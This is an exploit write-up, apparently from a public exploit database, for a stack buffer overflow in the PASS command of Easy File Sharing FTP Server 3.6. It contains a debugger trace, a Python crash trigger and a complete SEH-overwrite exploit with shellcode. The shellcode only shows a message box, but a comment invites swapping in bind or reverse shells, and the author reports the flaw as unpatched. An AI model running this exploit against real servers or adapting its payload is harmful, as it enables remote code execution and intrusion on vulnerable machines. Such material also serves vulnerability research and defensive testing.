Easy File Sharing FTP Server 3.6 Stack Buffer Overflow



EKU-ID: 5305 CVE: OSVDB-ID:
Author: zeifan Published: 2015-12-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: Easy File Sharing FTP Server 3.6 (0day) - Stack Overflow
# Date: 13-12-2015
# Exploit Author: @zeifan
# Vendor Homepage: http://www.sharing-file.com/products.htm
# Software Link: http://www.efssoft.com/efsfs.exe
# Version: 3.6 (REQUIRED)
# Tested on: Windows 7 SP1 x86
# CVE : No CVE (Vendor contacted, no response)


1. Description
===============
To trigger the vulnerability, we need to send buffer more than 3000 bytes. Vulnerable part is the "PASS" input. So in this case the target should be like e.g. (Python): 
	
	reqftp += "A" * 3000
	... code cut here ...
	s.send("PASS " + reqftp + "\r\n")
	
However, before sending the buffer to "PASS" input, we need to escaped a character by using "\x2c", example below. Further info, https://www.cleo.com/support/byproduct/lexicom/usersguide/ftp_configuration.htm. 

	reqftp = "\x2c" + "A" * 3000

Upon overflowing, it will stop here at this function: 

0046C18C  /$ 56             PUSH ESI
0046C18D  |. 57             PUSH EDI
0046C18E  |. 8B7C24 0C      MOV EDI,DWORD PTR SS:[ESP+C]
0046C192  |. 8BF1           MOV ESI,ECX
0046C194  |. 8B0E           MOV ECX,DWORD PTR DS:[ESI]
0046C196  |. 8B07           MOV EAX,DWORD PTR DS:[EDI]
0046C198  |. 3BC8           CMP ECX,EAX
0046C19A  |. 74 39          JE SHORT fsfs.0046C1D5
0046C19C  |. 8379 F4 00     CMP DWORD PTR DS:[ECX-C],0
0046C1A0  |. 7D 0B          JGE SHORT fsfs.0046C1AD
0046C1A2  |. 83C1 F4        ADD ECX,-0C
0046C1A5  |. 3B0D 78A04900  CMP ECX,DWORD PTR DS:[49A078]            ;  fsfs.0049A07C
0046C1AB  |. 75 06          JNZ SHORT fsfs.0046C1B3
0046C1AD  |> 8378 F4 00     CMP DWORD PTR DS:[EAX-C],0		<--- EIP 

Continuing the execution by pressing "Shift + F9" (Immunity Debugger) will overwrite the EIP, e.g. (Register):

EAX 00000000
ECX 41414141
EDX 777771CD ntdll.777771CD
EBX 00000000
ESP 04279D18
EBP 04279D38
ESI 00000000
EDI 00000000
EIP 41414141

Below are the proof of concept to trigger overflow as well to control the EIP.

	# Trigger overflow
	import socket, sys

	if len(sys.argv) <= 1:
		print "Usage: poc.py <target_ip> <target_port>"
		exit(1)
	ip = sys.argv[1]
	port = int(sys.argv[2])
	
	reqftp = "\x2c" + "A" * 3000
	reqftp += "\x42"*30

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((ip, port))
	s.recv(1024)
	s.send("USER anonymous\r\n")
	s.recv(1024)
	s.send("PASS " + reqftp + "\r\n")
	s.recv(1024)
	s.close()
	
	
2. Proof of Concept (Working Exploit - SEH)

	# Crafted for fun and polishing skillz!
	# @zeifan
	import sys, socket, struct

	if len(sys.argv) <= 1:
		print "\nEasy File Sharing FTP Server 3.6 Stack Overflow - @zeifan"
		print "\nUsage: poc.py <target_ip> <port>\n"
		exit()
	ip = sys.argv[1]
	port = int(sys.argv[2])	
	
	# Shellcode can be change to any (bind, reverse, etc.)
	# Hello World MessageBoxW Shellcode
	# https://www.exploit-db.com/exploits/37758/
	shellcode = ("\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" +
		"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" +
		"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" +
		"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" +
		"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" +
		"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" +
		"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" +
		"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" +
		"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" +
		"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" +
		"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" +
		"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" +
		"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" +
		"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" +
		"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" +
		"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" +
		"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" +
		"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" +
		"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" +
		"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"
	)

	# Escaped character + Buffer 
	reqftp = "\x2c" + "\x41" * 2559

	# 16 bytes SEH
	reqftp += "\xeb\x10\x90\x90"  
	
	# 0x100182d3 : {pivot 8 / 0x08}
	# POP EBP 
	# MOV EAX,1 
	# POP EBX 
	# RETN
	reqftp += struct.pack("<I", 0x100182d3) 
	reqftp += "\x42" * 100
	reqftp += shellcode

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((ip, port))
	print "\nMessageBox will pop up!"
	s.recv(1024)
	s.send("USER anonymous\r\n")
	s.recv(1024)
	s.send("PASS " + reqftp + "\r\n")
	s.recv(1024)
	s.close()
	

3. Solutions
No solution as the affected software are the latest update (at least from the site).


*** Shout to Yeh, yodan, Lai, KS, t1nk3r, JinJin ***